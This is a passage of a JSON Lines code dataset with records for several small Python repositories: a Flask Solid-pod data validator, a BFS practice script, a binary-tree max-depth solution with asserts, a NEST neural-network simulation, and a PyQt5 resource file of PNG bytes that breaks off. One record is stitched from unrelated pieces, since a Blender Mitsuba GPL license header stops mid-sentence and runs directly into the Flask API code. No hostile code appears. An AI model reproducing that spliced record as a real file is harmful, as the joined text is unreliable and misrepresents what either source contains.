system)\n","repo_name":"ansko/CompDrawer","sub_path":"ConsoleUI/UserCommandsExecutor.py","file_name":"UserCommandsExecutor.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29716091703","text":"# -*- coding: utf8 -*-\n#\n# ***** BEGIN GPL LICENSE BLOCK *****\n#\n# --------------------------------------------------------------------------\n# Blender Mitsuba Add-On\n# --------------------------------------------------------------------------\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, seequerying pod API
\"\n\n@app.route('/get-data', methods=['GET'])\ndef get_data():\n r = requests.get(\n _pod + \"/my-files/20200206.ttl\",\n auth=BearerAuth(_auth_token)\n )\n return r.text\n\n@app.route('/get-data-validate', methods=['GET'])\ndef get_data_validate():\n rdf = get_data()\n\n p = MyPrefixLibrary()\n p.add_rdf(rdf)\n p.add_shex(_shex)\n\n results = ShExEvaluator(rdf=rdf,\n schema=_shex,\n focus=[p.get_namespace('').data],\n start=p.EX.HKData).evaluate()\n\n if (all(res.result for res in results)):\n print(\"Validation passed!\")\n return rdf\n else:\n print(\"Something went wrong!\")\n return \"VALIDATION ERROR
\"\n\napp.run()\n","repo_name":"pmbrull/pod-api-validator","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71453049362","text":"def BFS(G, v):\n visited = [0 for _ in range(7)]\n queue = [v]\n while queue:\n t = queue.pop(0)\n if not visited[t]:\n print(t+1, end= ' ')\n visited[t] = True \n for i in range(len(G[t])):\n if G[t][i] and not visited[i]:\n queue.append(i)\n\na = [1,2,1,3,2,4,2,5,4,6,5,6,6,7,3,7]\n\ncase =[[0 for _ in range(7)] for _ in range(7)]\nfor i in range(0,len(a),2):\n case[a[i]-1][a[i+1]-1]= 1\n case[a[i+1]-1][a[i]-1]= 1\nBFS(case,0)","repo_name":"dowookims/ProblemSolving","sub_path":"swea/queue/practice5_bfs.py","file_name":"practice5_bfs.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7495432786","text":"from typing import Optional\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n stack = [[root, 1]]\n maxDepth = 0\n\n while stack:\n curr, depth = stack.pop()\n\n if curr:\n maxDepth = max(depth, maxDepth)\n stack.append([curr.left, depth + 1])\n stack.append([curr.right, depth + 1])\n\n return maxDepth\n\n\"\"\"\nExplanation:\n\nInitialize a stack with the root node and its depth set to 1. Set maxDepth to 0, which stores the maximum depth encountered. While the stack is not empty, pop a node from the stack. If the node is not null, update maxDepth with the max value between the current depth and maxDepth. Push the left and right children of the node onto the stack with their depths incremented by 1. Once done, return maxDepth as the maximum depth of the binary tree.\n\nNotes:\n\nTime complexity: O(n), where n is the number of nodes in the binary tree, because we need to visit each node exactly once.\n\nSpace complexity: O(h), where h is the max height of the binary tree. In the worst case, where the binary tree is skewed and has a height of n (all nodes form a single branch), the stack can hold up to n elements.\n\"\"\"\n\n# Test 1: Empty binary tree\nroot = None\nmax_depth = Solution().maxDepth(root)\nexpected = 0\nassert max_depth == expected, f\"Expected {expected} but got {max_depth}\"\n\n# Test 2: Single-node binary tree\nroot = TreeNode(1)\nmax_depth = Solution().maxDepth(root)\nexpected = 1\nassert max_depth == expected, f\"Expected {expected} but got {max_depth}\"\n\n# Test 3: Balanced binary tree\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nmax_depth = Solution().maxDepth(root)\nexpected = 2\nassert max_depth == expected, f\"Expected {expected} but got {max_depth}\"\n\n# Test 4: Binary tree with balanced and skewed structure\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.right.right = TreeNode(5)\nmax_depth = Solution().maxDepth(root)\nexpected = 3\nassert max_depth == expected, f\"Expected {expected} but got {max_depth}\"\n\n# Test 5: Skewed binary tree\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.left.left = TreeNode(3)\nroot.left.left.left = TreeNode(4)\nroot.left.left.left.left = TreeNode(5)\nmax_depth = Solution().maxDepth(root)\nexpected = 5\nassert max_depth == expected, f\"Expected {expected} but got {max_depth}\"","repo_name":"garofalof/algopractice_python","sub_path":"easy/104_Maximum_Depth_of_Binary_Tree.py","file_name":"104_Maximum_Depth_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23155515350","text":"import nest\nimport numpy as np\nimport os\nimport simulation_parameters_MN as sp\nimport pylab as pl\nimport nest.raster_plot\nPS = sp.global_parameters()\nparams = PS.params\n\nnest.ResetKernel()\n\n# CREATE MINICOLUMNS WITHIN HYPERCOLUMNS\nhcs = [ [] for i in xrange(params['n_hc'])]\nmcs = [ None for i in xrange(params['n_mc'])]\nfor i_hc in xrange(params['n_hc']):\n\tfor i_mc in xrange(params['n_mc_per_hc']):\n\t mcs[params['n_mc_per_hc']*i_hc+i_mc] = nest.Create(params['neuron_type'], params['n_exc_per_mc'])\n\t hcs[i_hc].append(mcs[params['n_mc_per_hc']*i_hc+i_mc])\n\n\n# CREATE INHIBITORY NEURONS FOR CROSS INHIBITION\ninh_pops = [ None for i in xrange(params['n_hc'])]\nfor i_hc in xrange(params['n_hc']):\n inh_pops[i_hc] = nest.Create(params['neuron_type'], params['n_inh_per_hc'])\n\n\"\"\" AUXILARY STUFF \"\"\"\n# CREATING SPIKE DETECTOR\nspikerec = nest.Create('spike_detector', params['n_mc'])\n# CREATING POISSON GENERATOR FOR INPUT\npoiss = nest.Create('poisson_generator', params['n_mc'],{'rate': 4000.})\n\"\"\" \"\"\"\n\n# CONNECT CELLS WITHIN MINICOLUMNS + \nn_tgt = int(np.round(params['p_ee_local'] * params['n_exc_per_mc']))\nfor i_mc in xrange(params['n_mc']):\n\tnest.RandomConvergentConnect(mcs[i_mc], mcs[i_mc], n_tgt, \\\n\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\n\t\t\t\n\t\t\t\nfor i_hc in xrange(params['n_hc']):\t\n\tfor i_mc in xrange(params['n_mc_per_hc']):\n\t\t# CONNECT INHIBITORY POPULATION WITH MINICOLUMS\t\t\n\t\tnest.RandomConvergentConnect(hcs[i_hc][i_mc], inh_pops[i_hc], n_tgt, \\\n\t\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\n\t\tnest.RandomConvergentConnect(inh_pops[i_hc],hcs[i_hc][i_mc], 10, weight=-5., delay=params['delay_ee_local'], options={'allow_autapses': False, 'allow_multapses': False}) #10 to trito orisma\n\t\t# FINALLY CONNECT MINICOLUMN NEURONS WITH SPIKE RECORDER\n\t\tnest.ConvergentConnect(mcs[params['n_mc_per_hc']*i_hc+i_mc], [spikerec[params['n_mc_per_hc']*i_hc+i_mc]])\n\n# CONNECT HYPERCOLUMNS TOGETHER \nnest.RandomConvergentConnect(hcs[0][0], hcs[1][0], n_tgt, \\\n\t\t\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\nnest.RandomConvergentConnect(hcs[0][0], hcs[1][1], n_tgt, \\\n\t\t\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\nnest.RandomConvergentConnect(hcs[0][1], hcs[1][0], n_tgt, \\\n\t\t\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\nnest.RandomConvergentConnect(hcs[0][1], hcs[1][1], n_tgt, \\\n\t\t\t\t\tweight=params['w_ee_local'], delay=params['delay_ee_local'], \\\n\t\t\t\t\toptions={'allow_autapses': False, 'allow_multapses': False})\n\t\t\t\t\t\t\t\t\t\t\n# CONNECT INPUT TO FIRST HYPERCOLUMN's first minicolumn\nnest.DivergentConnect([poiss[0]], hcs[0][0], params['w_ee_local'],params['delay_ee_global'])\nnest.DivergentConnect([poiss[0]], hcs[0][1], params['w_ee_local'],params['delay_ee_global'])\n\n# check the connectivity\nconnections = nest.GetConnections()\nconn_list = np.zeros((len(connections), 3)) # 3 columns for src, tgt, weight\n\"\"\"\nprint 'example connections:'\nfor i in connections:\n\tprint i\nprint 'information from nest.GetStatus', nest.GetStatus([connections[0]])\n\"\"\"\n\nfor i_ in xrange(len(connections)):\n info = nest.GetStatus([connections[i_]])\n weight = info[0]['weight']\n conn_list[i_, 0] = connections[i_][0]\n conn_list[i_, 1] = connections[i_][1]\n conn_list[i_, 2] = weight\n\n\nnp.savetxt('debug_connectivity.txt', conn_list)\n\nnest.Simulate(500.0)\n\ndata = nest.GetStatus(spikerec)\n\nkolor=['k','b','y','g','c','m']\nfor i in xrange(len(spikerec)):\n\ta,b = data[i]['events']['times'],data[i]['events']['senders']\n\tpl.subplot(211)\n\tpl.scatter(a,b,marker='.',color=kolor[i])\n#nest.raster_plot.from_device(spikerec, hist=True)\n#nest.raster_plot.show()\n\n\npl.ylabel('Neuron ID')\npl.title('\\\"Minicolumn Neurons Spiking\\\"')\n\n\npl.subplot(223)\npl.ylabel('Rate(Hz)')\npl.xlabel('Time')\npl.hist(a,20)\n\npl.show()\n\n\n","repo_name":"kalfasyan/pynest-indieproject","sub_path":"06_twoHypercolumns.py","file_name":"06_twoHypercolumns.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"19825922125","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x01\\xd5\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x32\\x00\\x00\\x00\\x32\\x08\\x06\\x00\\x00\\x00\\x1e\\x3f\\x88\\xb1\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x01\\x8a\\x49\\x44\\x41\\x54\\x68\\x81\\xed\\xda\\x3d\\x4e\\\n\\xc3\\x40\\x18\\x84\\xe1\\xd9\\x28\\x8a\\x44\\x85\\x04\\x2d\\x77\\xa0\\x46\\x5c\\\n\\x83\\xc3\\x50\\xa6\\x81\\x90\\x63\\x40\\xc5\\x09\\x38\\x01\\x0d\\x45\\x92\\x86\\\n\\x8e\\x96\\x04\\x51\\x72\\x01\\x5e\\x8a\\x98\\x3f\\xc5\\x58\\xfb\\x39\\x31\\x19\\\n\\x47\\x9e\\x7a\\x3f\\x6b\\x1e\\x65\\x65\\x5b\\xce\\x0a\\x18\\x00\\x63\\x60\\x81\\\n\\x4f\\xe6\\xc0\\x08\\x18\\x28\\x37\\xc0\\xd5\\x96\\x4b\\x57\\xe5\\x32\\x02\\x99\\\n\\x17\\x43\\x27\\xd9\\x43\\x0d\\x07\\x38\\x2d\\x3a\\xcd\\x23\\x43\\x00\\x34\\xd8\\\n\\xab\\x56\\xa2\\xbd\\x7a\\x4d\\x96\\xf9\\xcf\\x74\\x10\\xb7\\x74\\x10\\xb7\\x38\\\n\\x43\\xce\\x23\\x8b\\xfb\\x4d\\xb5\\x58\\x37\\x29\\xa5\\x31\\xb0\\x97\\x3d\\xe0\\\n\\xfa\\x1c\\x89\\xc6\\x79\\x6b\\x85\\x62\\x09\\x01\\x6e\\x81\\x3b\\x60\\x3f\\x32\\\n\\x64\\xb7\\xb5\\x80\\x49\\x51\\xeb\\x21\\x1b\\x63\\x0a\\x39\\x02\\x9e\\x8a\\x6a\\\n\\x13\\xe0\\x20\\x67\\xc8\\x0e\\x22\\xd5\\xc0\\xb8\\x42\\xa4\\x15\\xcc\\xb4\\x12\\\n\\xe3\\x0c\\x91\\x02\\x18\\x77\\x88\\x54\\x8a\\x39\\x2c\\x5b\\x64\\x0f\\x91\\x32\\\n\\x30\\x6d\\x81\\x48\\x2b\\x98\\xd9\\x2f\\x4c\\x9b\\x20\\x52\\x05\\xa6\\x6d\\x10\\\n\\xa9\\x1c\\x93\\x3e\\x11\\x29\\xa5\\x54\\xe3\\x82\\x49\\xd2\\x4c\\xd2\\xf1\\xa6\\\n\\xcb\\x06\\x33\\x5d\\xf7\\x5d\\x2b\\x49\\x7a\\xdf\\x44\\x93\\xb5\\xb3\\x2b\\x5b\\\n\\xab\\x75\\x90\\x3f\\x6f\\xc3\\x6d\\x82\\x54\\x3e\\x4b\\xda\\x02\\xd9\\x89\\x07\\\n\\x62\\x09\\x62\\xf5\\x7d\\xcb\\x1d\\x42\\xee\\xeb\\xbc\\x33\\x24\\x1b\\x51\\x2c\\\n\\xb6\\x84\\x84\\x10\\xc5\\x80\\x1d\\x24\\x8c\\x28\\x86\\x1c\\x21\\x8f\\x45\\xad\\\n\\xec\\x8f\\x0f\\xae\\x5f\\x1a\\x5f\\x25\\xbd\\x48\\x3a\\x4b\\x29\\xbd\\x65\\x4d\\\n\\x38\\xfe\\x22\\x75\\x62\\xf9\\x81\\xae\\x4e\\xac\\x21\\xc0\\x30\\xb2\\xd8\\x72\\\n\\x6b\\x01\\xc3\\x50\\x2f\\x63\\x48\\xa8\\x97\\xf5\\xd6\\x8a\\xa4\\x83\\xb8\\xa5\\\n\\x83\\xb8\\xa5\\x27\\x69\\x21\\x2d\\x0f\\xb2\\x6c\\xb9\\xcb\\x57\\x7e\\x74\\xc9\\\n\\x3e\\x54\\xd3\\x97\\x74\\xa3\\xe5\\x5f\\xc1\\xf7\\x86\\x77\\xe1\\xeb\\xec\\x95\\\n\\x2c\\x0f\\x9e\\x8d\\xf8\\x3e\\xee\\xe4\\x90\\x67\\xe0\\x82\\xc0\\xc1\\xb3\\x0f\\\n\\xbe\\xa2\\x55\\xfa\\x05\\x62\\xf5\\xda\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\\n\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x07\\x51\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x64\\x00\\x00\\x00\\x64\\x08\\x06\\x00\\x00\\x00\\x70\\xe2\\x95\\x54\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x07\\x06\\x49\\x44\\x41\\x54\\x78\\x9c\\xed\\x9c\\x6d\\xac\\\n\\x1d\\x45\\x19\\xc7\\xff\\x4f\\xbd\\x2d\\x05\\xd3\\x96\\x96\\x06\\x09\\x44\\x2a\\\n\\x90\\xa6\\x21\\xd0\\x90\\x00\\x6d\\x14\\x63\\x10\\x63\\x43\\x44\\xdb\\xd2\\x42\\\n\\x42\\x20\\x40\\x03\\x11\\xbe\\x18\\x5e\\xc4\\x10\\xf0\\x25\\x4d\\x40\\x45\\x89\\\n\\x11\\x05\\x1b\\x3e\\x18\\x15\\x3e\\x28\\xa6\\x06\\x12\\x4a\\x4a\\x48\\xa1\\x2f\\\n\\x80\\x2f\\xad\\x2f\\x84\\x1a\\xb1\\x0d\\x69\\x20\\xc5\\x6a\\x6a\\x31\\x96\\xb4\\\n\\x35\\x45\\x2b\\xb7\\x3f\\x3f\\xcc\\xb9\\xd7\\xed\\x74\\xcf\\x9e\\xdd\\xd9\\xbd\\\n\\xbb\\x73\\x2e\\xf3\\x4b\\x4e\\x72\\xf6\\x65\\x9e\\xe7\\x99\\xf9\\x9f\\x3d\\xb3\\\n\\x33\\xf3\\xec\\x4a\\x89\\x44\\x22\\x91\\x48\\x24\\x12\\x89\\x44\\x22\\x91\\x48\\\n\\x24\\xe2\\xc1\\xfa\\x1d\\x00\\x68\\x33\\x90\\xf7\\x11\\xaf\\x4b\\xba\\xc9\\xcc\\\n\\xb6\\xe6\\x1d\\x4c\\x82\\x74\\xc3\\x0e\\x33\\x3b\\x2f\\xef\\x40\\x12\\xa4\\x23\\\n\\xcc\\x2c\\xb7\\xed\\xa7\\xb4\\x1d\\x48\\xa2\\x98\\x24\\x48\\x64\\x24\\x41\\x22\\\n\\x23\\x09\\x12\\x19\\x49\\x90\\xc8\\x48\\x82\\x44\\x46\\x12\\x24\\x32\\x46\\x02\\\n\\xcb\\xed\\x93\\xf4\\x9c\\xa4\\x17\\x25\\xfd\\x59\\xd2\\x6e\\x49\\x07\\x25\\x21\\\n\\x69\\x96\\xa4\\x79\\x92\\xce\\x93\\xf4\\x49\\x49\\x57\\x48\\xfa\\x50\\xed\\x48\\\n\\xdf\\x27\\x54\\x1d\\x18\\xfe\\x5a\\xd2\\x77\\x24\\x3d\\x6b\\x66\\xef\\x95\\x71\\\n\\x00\\x8c\\x48\\xfa\\x8c\\xa4\\xbb\\x25\\x7d\\x22\\x24\\xc8\\xc9\\x48\\xbf\\x81\\\n\\x61\\x5f\\x38\\x96\\xdd\\xc0\\x67\\xeb\\x06\\x01\\x5c\\x01\\xbc\\x41\\x05\\xea\\\n\\xfa\\x2c\\x11\\x53\\xa3\\x7e\\x27\\xac\\x5e\\x99\\xb2\\xbf\\x00\\x66\\x84\\x06\\\n\\x98\\x63\\x77\\x06\\xf0\\xb3\\x24\\x48\\x98\\xe1\\x07\\x80\\xdc\\x4b\\x0b\\x58\\\n\\x00\\xdc\\x03\\x6c\\x04\\x76\\x02\\xff\\xea\\x7d\\x76\\xf6\\xf6\\xdd\\x03\\x2c\\\n\\x28\\xb0\\x7f\\x5f\\x12\\xa4\\x9a\\xe1\\xd5\\x7d\\xf6\\x2f\\x02\\x36\\x97\\x75\\\n\\x0c\\x6c\\x02\\x2e\\xee\\x63\\xeb\\xfe\\xc6\\x03\\xaf\\x48\\xd3\\x7e\\xcb\\x36\\\n\\x4a\\x13\\x81\\x4f\\x05\\x1e\\x05\\x8e\\x96\\x75\\x9a\\xe1\\x28\\xb0\\x06\\x98\\\n\\x9a\\x63\\xf7\\x89\\x00\\x7b\\x43\\x4f\\xbf\\x76\\x2e\\xd5\\xd3\\x03\\x73\\x24\\\n\\x3d\\x25\\x77\\x1b\\x5b\\x87\\x2d\\x92\\xae\\x32\\xb3\\x77\\x32\\xb6\\x67\\x48\\\n\\xfa\\xa3\\xa4\\xb3\\x6a\\xda\\x1e\\x2a\\x82\\xa7\\xdf\\x71\\xbf\\xea\\x26\\xc4\\\n\\x90\\xa4\\xcb\\x24\\x3d\\x45\\xe6\\x4a\\x31\\xb3\\x43\\x92\\x6e\\x6f\\xc0\\xf6\\\n\\xa4\\xa0\\xcc\\x48\\xfd\\x61\\x35\\x23\\xc6\\x18\\x97\\x49\\x7a\\x28\\xbb\\xc3\\\n\\xcc\\xd6\\x4b\\xfa\\x55\\x83\\x3e\\x86\\x96\\xc2\\xbf\\x2c\\x60\\x91\\xa4\\xdf\\\n\\x0e\\x3a\\x2f\\x00\\x24\\x2d\\x32\\xb3\\x57\\x32\\xbe\\x96\\x4a\\x7a\\xa6\\x61\\\n\\x3f\\xd1\\xd2\\xef\\x2f\\x6b\\x90\\x20\\x9b\\xe5\\x7e\\xd1\\x13\\xc1\\x46\\x33\\\n\\x5b\\x92\\xf1\\x35\\x22\\xe9\\x6f\\x92\\x4e\\x9d\\x20\\x7f\\x51\\x11\\x32\\x52\\\n\\x3f\\xb7\\x85\\x9b\\x8d\\x05\\x9e\\xcf\\xc7\\xca\\xde\\x8d\\xc4\\x4a\\xd9\\x8a\\\n\\xf7\\x2b\\x5f\\xd4\\x87\\x2c\\x9b\\x80\\x78\\x07\\xf9\\x78\\xa9\\x05\\x9f\\x51\\\n\\x53\\x24\\xc8\\x92\\x82\\x63\\x4d\\xe1\\xfb\\x78\\xad\\x05\\x9f\\x51\\x53\\x24\\\n\\xc8\\x87\\x5b\\xf0\\x7f\\xa6\\xb7\\xfd\\x56\\x0b\\x3e\\xa3\\xa6\\x68\\x3d\\xe4\\\n\\xf4\\x16\\xfc\\x9f\\xe1\\x6d\\x1f\\xf4\\x4f\\x18\\xc6\\x7e\\xa4\\x0e\\x45\\x57\\\n\\x48\\x1b\\x0d\\x71\\xb4\\x05\\x1f\\x43\\x45\\x91\\x20\\x7b\\x5b\\xf0\\xef\\xfb\\\n\\x98\\xd5\\x82\\xcf\\xa8\\x29\\x12\\xe4\\x2f\\x2d\\xf8\\xf7\\xfb\\x8c\\x79\\x2d\\\n\\xf8\\x8c\\x9a\\x22\\x41\\x5e\\x68\\xc1\\xbf\\xef\\x63\\x61\\x0b\\x3e\\xa3\\xa6\\\n\\x48\\x90\\x75\\x2d\\xf8\\xf7\\x7d\\x5c\\xda\\xa0\\xed\\x03\\x92\\xde\\x6d\\xd0\\\n\\x5e\\x2b\\xf4\\x15\\xc4\\xcc\\x5e\\x97\\xb4\\x79\\x02\\x7d\\x6f\\x34\\xb3\\x5d\\\n\\x63\\x1b\\xfc\\x3f\\x19\\x22\\x94\\xb7\\x25\\x7d\\x5d\\x2e\\x91\\xe2\\x44\\x33\\\n\\x3b\\xd9\\xcc\\x4e\\x92\\x34\\x57\\xd2\\x0a\\x49\\x6b\\x25\\x95\\x4a\\xcc\\x88\\\n\\x16\\xe0\\x62\\xc2\\x16\\xa4\\x06\\x31\\x0a\\x5c\\xe8\\xf9\\x5a\\x59\\xc3\\xd6\\\n\\xfd\\xc0\\x49\\x25\\xea\\xb3\\x10\\xf8\\x65\\x43\\x75\\xa8\\x45\\x1d\\x51\\xd6\\\n\\x4c\\x40\\x3c\\x8f\\xe4\\xf8\\x79\\x39\\xc0\\xce\\x61\\xe0\\xf2\\x8a\\xf5\\x19\\\n\\x01\\x1e\\x6f\\xb4\\x36\\x01\\xd4\\x11\\x64\\x2a\\xd5\\xd6\\xd0\\x07\\xb1\\x09\\\n\\x6f\\x29\\x17\\x58\\x1e\\x60\\x67\\x14\\xb8\\xba\\x20\\xee\\x99\\xc0\\x89\\x7d\\\n\\x8e\\x19\\x39\\x13\\x99\\x6d\\x12\\x2c\\x48\\xaf\\x02\\xb3\\x69\\x46\\x94\\x4d\\\n\\xc0\\x6c\\xcf\\xf6\\x2c\\x5c\\xde\\x57\\x55\\xbe\\x9a\\x13\\xe7\\xe9\\xb8\\x75\\\n\\xff\\xbd\\x99\\xf3\\xb6\\x03\\xb7\\x00\\x53\\xbc\\x73\\xa7\\x03\\x7f\\xaa\\x57\\\n\\x9d\\x70\\x6a\\x09\\xd2\\xab\\xc0\\x54\\xe0\\x07\\x84\\xf5\\x29\\xa3\\xc0\\x23\\\n\\xb8\\x8e\\x3b\\x6b\\xd3\\x80\\x9f\\x07\\xd8\\x5b\\x8b\\x97\\x9e\\x04\\x5c\\x08\\\n\\xec\\x2b\\x28\\xb3\\x1e\\xef\\x8a\\x01\\x96\\x05\\xf8\\x6e\\x84\\xda\\x82\\x64\\\n\\x2a\\x71\\x11\\x2e\\xef\\xaa\\x2c\\x2f\\xe0\\x75\\xe0\\x19\\x5b\\xdf\\x08\\xa8\\\n\\xcb\\x2b\\x78\\x1d\\x38\\x70\\x1a\\xb0\\xa7\\x44\\xd9\\xb5\\x5e\\x39\\x03\\xfe\\\n\\x1a\\x10\\x43\\x6d\\x1a\\x13\\x24\\x53\\x99\\xf9\\xc0\\xdd\\xc0\\xf3\\xb8\\xe4\\\n\\xb8\\x43\\xbd\\xcf\\x0e\\x60\\x43\\xef\\xd8\\xfc\\x82\\xf2\\x21\\x62\\xfc\\x1d\\\n\\x38\\xd3\\xb3\\x73\\x02\\xf0\\x9b\\x0a\\x36\\x2e\\xf1\\xca\\xff\\x30\\x20\\x8e\\\n\\xda\\x34\\x2e\\x48\\x1d\\x70\\x77\\x3a\\x8b\\x81\\x1b\\x80\\x6f\\x02\\x5b\\x80\\\n\\x23\\x03\\xea\\xf0\\x1f\\xe0\\xe3\\x39\\xb6\\x7e\\x52\\xb1\\x2d\\xbe\\xe5\\x95\\\n\\xbf\\xb3\\x62\\xf9\\x46\\x68\\xaf\\xb5\\x03\\xc1\\x75\\xee\\x57\\x01\\xeb\\x70\\\n\\x7d\\x8e\\xcf\\xe7\\x73\\xca\\x7c\\x31\\xa0\\x2d\\x7e\\xea\\xd9\\xb8\\x2e\\xbc\\\n\\x59\\xc3\\x69\\xaf\\x65\\x1b\\x00\\x38\\x07\\xf8\\x1e\\x70\\xa0\\x17\\xff\\xc3\\\n\\x39\\xe7\\x2c\\x01\\xfe\\x1b\\xd0\\x16\\xdf\\xf7\\xec\\xac\\x6a\\xa6\\x89\\xab\\\n\\xd1\\x5e\\x6b\\x36\\x08\\x2e\\x53\\xfe\\x46\\x8e\\xbf\\x3b\\x9b\\x0f\\xec\\x0f\\\n\\x6c\\x8b\\x2f\\x78\\xb6\\x56\\x37\\xd4\\xc6\\x95\\xe8\\x57\\xe7\\x81\\xa9\\x28\\\n\\xc0\\x2c\\x49\\xcb\\x25\\x5d\\x29\\xe9\\x5c\\xb9\\xa5\\xdd\\x0f\\x06\\xb5\\xb0\\\n\\xe3\\xb0\\xdc\\xca\\xe0\\x6e\\x49\\x3b\\xe5\\xf2\\xbe\\x36\\x98\\xd9\\xee\\x32\\\n\\x85\\x81\\x99\\x92\\xb6\\xf5\\x62\\x09\\xf1\\x7d\\xb6\\x99\\xed\\xcb\\xd8\\x5b\\\n\\xa7\\x76\\x12\\x3a\\x8e\\x21\\x24\\x0d\\x68\\x1a\\xf0\\x25\\xe0\\x9f\\x2d\\xfd\\\n\\x68\\x7e\\x0f\\xdc\\x04\\x4c\\x2f\\x88\\x69\\x0a\\x6e\\x3c\\x11\\xca\\x5d\\x9e\\\n\\xbd\\x93\\x81\\x77\\x1b\\x88\\xbd\\x32\\x55\\xc5\\x98\\x0b\\xbc\\xd8\\x45\\xa0\\\n\\xc0\\xdb\\xc0\\xb7\\x81\\xe3\\x92\\x2c\\x80\\x07\\x6b\\xd8\\x5d\\xcf\\xf1\\x83\\\n\\xc9\\xaf\\x35\\x11\\x70\\x08\\x55\\xc4\\x38\\x95\\x8a\\x8f\\x9d\\x4d\\x10\\x47\\\n\\x70\\x4f\\x5a\\x2d\\xee\\xc5\\x75\\x1d\\xe1\\x33\\xcf\\x6f\\xe1\\x32\\xf8\\xb3\\\n\\xf5\\x9c\\x87\\x1b\\x37\\x75\\x42\\xbf\\xf6\\xf7\\x7f\\x31\\xd3\\xe4\\xd6\\x40\\\n\\x8e\\xbb\\xdf\\xef\\x98\\xdf\\xc9\\xad\\x26\\xe6\\x4e\\x16\\x0e\\xe0\\x88\\xa4\\\n\\x4b\\xcd\\x6c\\xdb\\xd8\\x0e\\xdc\\xe4\\xe6\\x4b\\x92\\x3e\\xd6\\x4c\\x78\\xd5\\\n\\xe9\\xd7\\x87\\xf8\\x69\\x40\\xb7\\x29\\x3e\\x31\\x24\\x69\\x71\\x8d\\xb2\\x77\\\n\\x64\\xc5\\xe8\\xf1\\x80\\x3a\\x14\\xa3\\x88\\x71\\x95\\x70\\x77\\x53\\x6f\\x4a\\\n\\x9a\\xd3\\xff\\xf4\\xa1\\xe3\\x31\\x33\\xbb\\x39\\xbb\\x03\\xf8\\x9c\\x5c\\x96\\\n\\x7d\\xd3\\x19\\xfd\\x95\\x28\\xf3\\xc0\\xce\\x95\\x9a\\x5c\\x62\\x6c\\x97\\xe4\\\n\\x8f\\x39\\x3e\\x22\\xe9\\x71\\x75\\x2c\\x46\\x11\\x59\\x41\\x96\\x77\\x16\\x45\\\n\\xf3\\xfc\\x43\\xd2\\x72\\x33\\x1b\\x4f\\x72\\xc0\\xcd\\x10\\x3f\\x2d\\xe9\\x94\\\n\\xce\\xa2\\x2a\\x41\\x56\\x90\\xf3\\x3b\\x8b\\xa2\\x59\\x46\\x25\\xdd\\x60\\x66\\\n\\x7e\\x5e\\xd9\\xa3\\x92\\x2e\\xe8\\x20\\x9e\\x4a\\x64\\x05\\x39\\xad\\xb3\\x28\\\n\\x9a\\xe5\\x2b\\x66\\xb6\\x21\\xbb\\x03\\xb8\\x5d\\xd2\\xaa\\x8e\\xe2\\xa9\\x44\\\n\\xb6\\x53\\x1f\\xce\\x09\\xaf\\x63\\x59\\x27\\x69\\x85\\x99\\x8d\\xd7\\x05\\xb7\\\n\\xfe\\xb1\\x45\\xd2\\xb4\\xce\\xa2\\xca\\x61\\xe0\\x23\\x6d\\x93\\x40\\x90\\x5d\\\n\\x92\\x2e\\xea\\x3d\\xd5\\x2b\\x49\\x02\\xce\\x90\\xf4\\x07\\x45\\x78\\xf5\\xc7\\\n\\xfe\\x56\\xd2\\xf7\\x24\\xfd\\xbb\\x46\\xf9\\x